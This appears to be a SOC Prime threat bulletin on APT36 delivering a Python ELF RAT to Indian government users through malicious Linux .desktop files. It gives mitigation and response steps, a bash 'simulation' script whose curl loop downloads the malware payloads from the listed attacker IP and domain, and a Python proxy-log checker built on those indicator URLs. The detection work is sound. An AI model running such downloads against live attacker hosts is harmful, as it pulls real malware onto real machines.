SOC Prime Bias: Critical

04 Dec 2025 18:28

APT36 Deploys Python ELF Malware Against Indian Government Entities

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

APT36 (Transparent Tribe) ran a spear-phishing campaign that dropped malicious Linux .desktop shortcut files on Indian government users. These launchers retrieve and run a Python-based ELF RAT named swcbc from an attacker-controlled server. The malware maintains persistence through a user-level systemd service and communicates with its C2 over HTTP to exfiltrate data and execute commands. The campaign underscores the group’s growing ability to operate effectively in Linux environments.

Investigation

The investigation followed the chain from the initial .zip attachment to the .desktop launcher, the decoy PDF, and the two payloads (swcbc ELF binary and swcbc.sh script) downloaded from an actor-controlled IP address. Analysis showed the ELF binary is a PyInstaller-packed Python RAT with capabilities for system profiling, file upload/download, screen capture, and self-removal. Persistence is implemented by registering a systemd service inside the user’s configuration directory.

Mitigation

Recommended defenses include blocking execution of .desktop, .sh, and ELF binaries received via email and enforcing sandbox execution for suspicious attachments. Disable automatic execution from world-writable paths like /tmp and apply noexec mount options where possible. Monitor DNS and HTTP traffic for connections to the identified malicious domain and IP. Enforce strict application control on tools such as curl and LibreOffice.

Response

When activity is detected, isolate the impacted Linux host, collect the malicious artifacts and the systemd service unit, and remove the hidden ~/.swcbc directory. Use forensic tooling to extract the host’s unique identifier and terminate any ongoing C2 sessions. Update detection content with the observed IOCs and proactively hunt for similar patterns across the broader environment.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    An APT‑36 operator hosts three payloads on compromised infrastructure and distributes their URLs via a phishing email. The victim, using a web browser configured to route traffic through the corporate proxy, clicks each link. The proxy logs each GET request, producing entries that match the rule’s url|all list. The payloads are:

    1. A raw ELF binary (swcbc) delivered over HTTP.
    2. A shell script (swcbc.sh) that, when executed, installs the ELF.
    3. A decoy PDF (Analysis_Proc_Report_Gem.pdf) intended to encourage the user to open the file while the malicious ELF runs in the background.
  • Regression Test Script:

    #!/usr/bin/env bash
    # APT‑36 malicious URL download simulation – triggers the Sigma rule.
    set -euo pipefail
    
    # Define the malicious URLs (exact strings from the Sigma rule)
    urls=(
        "http://185.235.137.90:32587/uploads/yash10_52228826567/swcbc"
        "http://185.235.137.90:32587/uploads/yash10_52228826567/swcbc.sh"
        "https://lionsdenim.xyz/in/Analysis_Proc_Report_Gem.pdf"
    )
    
    # Download each payload through the corporate proxy.
    # Assume the environment variable http_proxy/https_proxy points to the proxy.
    for u in "${urls[@]}"; do
        echo "[*] Downloading $u via proxy..."
        curl -s -O "$u"
    done
    
    echo "[+] All malicious files downloaded. Check proxy logs for matching URLs."

    Save the script as apt36_simulation.sh, make it executable (chmod +x apt36_simulation.sh), and run it on the protected workstation.

  • Cleanup Commands:

    #!/usr/bin/env bash
    # Remove all files created by the simulation
    rm -f swcbc swcbc.sh Analysis_Proc_Report_Gem.pdf
    echo "[+] Cleanup complete."
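Defender-side check for the proxy telemetry the attack narrative relies on, added here as an example for this bulletin; it is not SOC Prime's code or the Sigma rule itself. It assumes a Squid-style native access.log layout and uses constructed sample lines; the indicator URLs are the three listed on this page, CONNECT tunnels to their hosts are flagged separately because a proxy without TLS inspection never logs the full HTTPS URL, and the "full chain" function is my reading of the rule's url|all intent (every payload URL seen from one client).

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Payload URLs exactly as this page lists them (the rule's url list).
MALICIOUS_URLS = frozenset({
    "http://185.235.137.90:32587/uploads/yash10_52228826567/swcbc",
    "http://185.235.137.90:32587/uploads/yash10_52228826567/swcbc.sh",
    "https://lionsdenim.xyz/in/Analysis_Proc_Report_Gem.pdf",
})
# Hostnames behind those URLs, for proxies that log only CONNECT host:port for TLS.
MALICIOUS_HOSTS = frozenset(urlparse(u).hostname for u in MALICIOUS_URLS)
# Assumed Squid native access.log layout: time elapsed client code/status bytes method url ...
_LINE = re.compile(r"^\d+\.\d+\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)")

def classify(line):
    """Return (client, kind, url) if the request touched an indicator, else None."""
    m = _LINE.match(line)
    if not m:
        return None
    client, method, url = m.group("client", "method", "url")
    if url in MALICIOUS_URLS:
        return client, "url", url          # exact match on a payload URL
    if method == "CONNECT" and url.rsplit(":", 1)[0] in MALICIOUS_HOSTS:
        return client, "host", url         # TLS tunnel to an indicator host, URL not visible
    return None

def find_hits(lines):
    """Every request that touched an indicator, as (client, kind, url)."""
    return [h for h in map(classify, lines) if h]

def clients_with_full_chain(lines):
    """Clients whose proxy history contains every payload URL: the complete delivery chain."""
    seen = defaultdict(set)
    for client, kind, url in find_hits(lines):
        if kind == "url":
            seen[client].add(url)
    return sorted(c for c, urls in seen.items() if urls == MALICIOUS_URLS)

# Constructed sample lines (not real telemetry): 10.0.0.5 fetches the whole chain, 10.0.0.7 only tunnels to the decoy host, 10.0.0.9 is benign.
SAMPLE_LOG = [
    "1733330001.120   152 10.0.0.5 TCP_MISS/200 512000 GET http://185.235.137.90:32587/uploads/yash10_52228826567/swcbc - HIER_DIRECT/185.235.137.90 application/octet-stream",
    "1733330002.441    88 10.0.0.5 TCP_MISS/200 1200 GET http://185.235.137.90:32587/uploads/yash10_52228826567/swcbc.sh - HIER_DIRECT/185.235.137.90 text/x-sh",
    "1733330003.009   210 10.0.0.5 TCP_MISS/200 98000 GET https://lionsdenim.xyz/in/Analysis_Proc_Report_Gem.pdf - HIER_DIRECT/203.0.113.9 application/pdf",
    "1733330010.500    40 10.0.0.7 TCP_TUNNEL/200 4200 CONNECT lionsdenim.xyz:443 - HIER_DIRECT/203.0.113.9 -",
    "1733330011.700    95 10.0.0.9 TCP_MISS/200 3000 GET https://example.org/index.html - HIER_DIRECT/93.184.216.34 text/html",
]
```

Running find_hits(SAMPLE_LOG) yields three url hits for 10.0.0.5 and one host hit for 10.0.0.7, and clients_with_full_chain(SAMPLE_LOG) returns only 10.0.0.5; after the regression script above runs, the protected workstation's address should appear the same way in the real proxy log.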